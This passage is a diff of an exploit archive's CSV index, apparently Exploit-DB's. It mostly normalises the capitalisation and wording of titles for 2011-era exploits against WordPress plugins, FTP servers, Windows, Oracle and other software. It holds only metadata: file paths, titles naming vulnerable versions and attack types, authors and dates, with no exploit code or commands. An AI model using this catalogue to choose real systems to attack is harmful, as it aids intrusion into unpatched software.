XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 +17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugin - timthumb.php Vulnerabilities",2011-09-19,"Ben Schmidt",php,webapps,0 +17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0 17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 17877,platforms/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,windows,local,0 @@ -15539,27 +15540,27 @@ id,file,description,date,author,platform,type,port 17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter - Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 17884,platforms/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,windows,remote,0 -17885,platforms/windows/dos/17885.txt,"sunway forcecontrol 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 -17886,platforms/windows/remote/17886.py,"FreeFloat FTP Server - Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote,0 -17887,platforms/php/webapps/17887.txt,"Wordpress Link Library plugin 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 -17888,platforms/php/webapps/17888.txt,"Wordpress AdRotate plugin 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 +17885,platforms/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 +17886,platforms/windows/remote/17886.py,"Freefloat FTP Server - Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote,0 +17887,platforms/php/webapps/17887.txt,"WordPress Link Library plugin 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 +17888,platforms/php/webapps/17888.txt,"WordPress AdRotate plugin 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 17890,platforms/windows/dos/17890.c,"GMER 1.0.15.15641 - MFT Overwrite",2011-09-26,Heurs,windows,dos,0 -17891,platforms/php/webapps/17891.txt,"Wordpress CevherShare Plugin 2.0 - SQL Injection",2011-09-26,bd0rk,php,webapps,0 -17892,platforms/windows/local/17892.pl,"Muse Music All-In-One 1.5.0.001 - '.pls' Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 +17891,platforms/php/webapps/17891.txt,"WordPress CevherShare Plugin 2.0 - SQL Injection",2011-09-26,bd0rk,php,webapps,0 +17892,platforms/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local,0 -17894,platforms/php/webapps/17894.txt,"Wordpress Mingle Forum plugin 1.0.31 - SQL Injection",2011-09-27,"Miroslav Stampar",php,webapps,0 +17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin 1.0.31 - SQL Injection",2011-09-27,"Miroslav Stampar",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17896,platforms/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System - SQL Injection",2011-09-27,"Indonesian BlackCoder",php,webapps,0 -17901,platforms/osx/dos/17901.c,"Mac OSX < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 +17901,platforms/osx/dos/17901.c,"Apple Mac OS X < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 17905,platforms/php/webapps/17905.txt,"Typo3 - File Disclosure",2011-09-29,"Number 7",php,webapps,0 -17906,platforms/php/webapps/17906.txt,"Wordpress Plugin Bannerize 2.8.7 - SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 +17906,platforms/php/webapps/17906.txt,"WordPress Plugin Bannerize 2.8.7 - SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 17908,platforms/freebsd/dos/17908.sh,"FreeBSD - UIPC socket heap Overflow (PoC)",2011-09-30,"Shaun Colley",freebsd,dos,0 17909,platforms/php/webapps/17909.txt,"MARINET CMS - 'room.php' Blind SQL Injection",2011-09-30,"BHG Security Center",php,webapps,0 17911,platforms/php/webapps/17911.php,"Feed on Feeds 0.5 - Remote PHP Code Injection",2011-09-30,EgiX,php,webapps,0 @@ -15567,13 +15568,13 @@ id,file,description,date,author,platform,type,port 17919,platforms/php/webapps/17919.txt,"Banana Dance CMS and Wiki - SQL Injection",2011-10-02,Aodrulez,php,webapps,0 17920,platforms/php/webapps/17920.txt,"Vivvo CMS - Local File Inclusion",2011-10-02,JaBrOtxHaCkEr,php,webapps,0 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0 -17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored Procedure SQL Injection",2011-10-02,Metasploit,cgi,webapps,0 +17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored procedure SQL Injection",2011-10-02,Metasploit,cgi,webapps,0 17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console - Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0 17925,platforms/php/webapps/17925.txt,"Concrete5 <= 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0 17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - '.ashprj' Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0 -17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 - .pdf File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 +17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 17930,platforms/windows/dos/17930.txt,"Cytel Studio 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17931,platforms/windows/dos/17931.txt,"genstat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0 @@ -15594,15 +15595,15 @@ id,file,description,date,author,platform,type,port 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0 17949,platforms/php/webapps/17949.rb,"MyBB 1.6.4 - Backdoor Exploit",2011-10-09,Metasploit,php,webapps,0 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 -17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 +17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",php,webapps,0 -17970,platforms/php/webapps/17970.txt,"WP-SpamFree Wordpress Spam Plugin - SQL Injection",2011-10-11,cheki,php,webapps,0 +17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin - SQL Injection",2011-10-11,cheki,php,webapps,0 17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection",2011-10-12,Mario_Vs,php,webapps,0 -17973,platforms/php/webapps/17973.txt,"Wordpress GD Star Rating plugin 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 +17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs - Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 -17957,platforms/php/webapps/17957.txt,"RoundCube 0.3.1 - XRF/SQL Injection",2011-10-10,"Smith Falcon",php,webapps,0 +17957,platforms/php/webapps/17957.txt,"Roundcube 0.3.1 - XRF/SQL Injection",2011-10-10,"Smith Falcon",php,webapps,0 17958,platforms/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0 17959,platforms/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 @@ -15612,20 +15613,20 @@ id,file,description,date,author,platform,type,port 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos,0 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File id Parameter Overflow",2011-10-10,Metasploit,windows,local,0 -17967,platforms/windows/local/17967.rb,"TugZip 3.5 - Zip File Parsing Buffer Overflow",2011-10-11,Metasploit,windows,local,0 +17967,platforms/windows/local/17967.rb,"TugZip 3.5 - '.ZIP' File Parsing Buffer Overflow",2011-10-11,Metasploit,windows,local,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD",2011-10-12,Metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (2)",2011-10-13,Metasploit,windows,remote,0 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0 -17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 -17980,platforms/php/webapps/17980.txt,"Wordpress Contact Form plugin 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 -17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 -17982,platforms/windows/dos/17982.pl,"BlueZone Desktop - .zap file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 -17983,platforms/php/webapps/17983.txt,"Wordpress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 +17978,platforms/windows/dos/17978.txt,"Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 +17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 +17981,platforms/windows/dos/17981.py,"Microsoft Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 +17982,platforms/windows/dos/17982.pl,"BlueZone Desktop - '.zap' file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 +17983,platforms/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow",2011-10-16,Metasploit,windows,local,0 17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 17986,platforms/osx/remote/17986.rb,"Apple Safari - file:// Arbitrary Code Execution",2011-10-17,Metasploit,osx,remote,0 -17987,platforms/php/webapps/17987.txt,"Wordpress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 +17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation",2011-10-18,Metasploit,windows,remote,0 17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps,0 @@ -15651,40 +15652,40 @@ id,file,description,date,author,platform,type,port 18014,platforms/windows/dos/18014.html,"Opera 11.51 - Use-After-Free Crash (PoC)",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,Metasploit,cgi,remote,0 18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile",2011-10-21,rgod,windows,remote,0 -18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (Poc)",2011-10-21,loneferret,windows,dos,0 -18018,platforms/php/webapps/18018.php,"Sports PHool 1.0 - Remote File Inclusion Exploit",2011-10-21,"cr4wl3r ",php,webapps,0 +18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC)",2011-10-21,loneferret,windows,dos,0 +18018,platforms/php/webapps/18018.php,"Sports PHool 1.0 - Remote File Inclusion",2011-10-21,"cr4wl3r ",php,webapps,0 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos,0 18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0 -18021,platforms/php/webapps/18021.php,"PHPLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0 +18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0 18024,platforms/windows/dos/18024.txt,"Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service (Denial of Service)",2011-10-23,"Prashant Uniyal",multiple,dos,0 18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos,0 -40298,platforms/windows/dos/40298.py,"Goron Webserver 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 +40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow",2011-10-24,Metasploit,windows,local,0 -18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 +18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone - Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 -18031,platforms/php/webapps/18031.rb,"PHPLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)",2011-10-25,Metasploit,php,webapps,0 +18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)",2011-10-25,Metasploit,php,webapps,0 18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution",2011-10-24,Metasploit,windows,webapps,0 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0 -18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 - (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 -18037,platforms/php/webapps/18037.rb,"PHPScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,Metasploit,php,webapps,0 +18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 +18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,Metasploit,php,webapps,0 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,Metasploit,windows,local,0 -18039,platforms/php/webapps/18039.txt,"Wordpress wptouch plugin - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 +18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 -18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0 +18051,platforms/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute arsqls24.dll Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,windows,dos,0 -18053,platforms/php/webapps/18053.txt,"Wordpress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0 -18055,platforms/php/webapps/18055.txt,"Wordpress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 +18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0 +18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0 18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 @@ -15706,59 +15707,59 @@ id,file,description,date,author,platform,type,port 18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 -18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow (3)",2011-11-04,Metasploit,windows,local,0 +18082,platforms/windows/local/18082.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (3)",2011-11-04,Metasploit,windows,local,0 18083,platforms/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18084,platforms/php/webapps/18084.php,"PHPMyFAQ 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Privilege Escalation (3)",2011-11-05,zx2c4,linux,local,0 -18087,platforms/windows/local/18087.rb,"Microsoft 2007 Excel - .xlb Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0 +18087,platforms/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow (DEP Bypass) (Metasploit)",2011-11-07,pasta,windows,remote,0 18090,platforms/php/webapps/18090.txt,"LabStoRe 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18091,platforms/php/webapps/18091.txt,"OrderSys 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0 -18093,platforms/windows/remote/18093.txt,"Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA Procedure Exploit",2011-11-07,"David Maman",windows,remote,0 +18093,platforms/windows/remote/18093.txt,"Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure Exploit",2011-11-07,"David Maman",windows,remote,0 18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 - 'do.php' CRLF Injection",2011-11-08,LiquidWorm,php,webapps,0 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 -18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 +18099,platforms/php/webapps/18099.txt,"osCSS2 - '_ID' Parameter Local file Inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"labwiki 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)",2011-11-09,Node,windows,remote,0 18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution",2011-11-13,Metasploit,php,webapps,0 -18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO - Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 +18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT Arbitrary DSO - Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,windows,dos,0 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,windows,dos,0 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow",2011-11-13,Metasploit,windows,local,0 18110,platforms/php/webapps/18110.txt,"Mambo CMS 4.x - (Zorder) SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0 18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client - Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 18120,platforms/linux/dos/18120.py,"FleaHttpd - Remote Denial of Service",2011-11-16,condis,linux,dos,80 -18111,platforms/php/webapps/18111.php,"Wordpress Zingiri Plugin 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 +18111,platforms/php/webapps/18111.php,"WordPress Zingiri Plugin 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 18132,platforms/php/webapps/18132.php,"Support Incident Tracker 3.65 - (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 18112,platforms/windows/dos/18112.txt,"optima apiftp server 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 -18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow",2011-11-14,Metasploit,windows,local,0 -18114,platforms/php/webapps/18114.txt,"Wordpress AdRotate plugin 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 +18113,platforms/windows/local/18113.rb,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow",2011-11-14,Metasploit,windows,local,0 +18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0 -18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 +18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload",2011-11-15,PCA,php,webapps,0 -18121,platforms/php/webapps/18121.txt,"FreeWebshop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 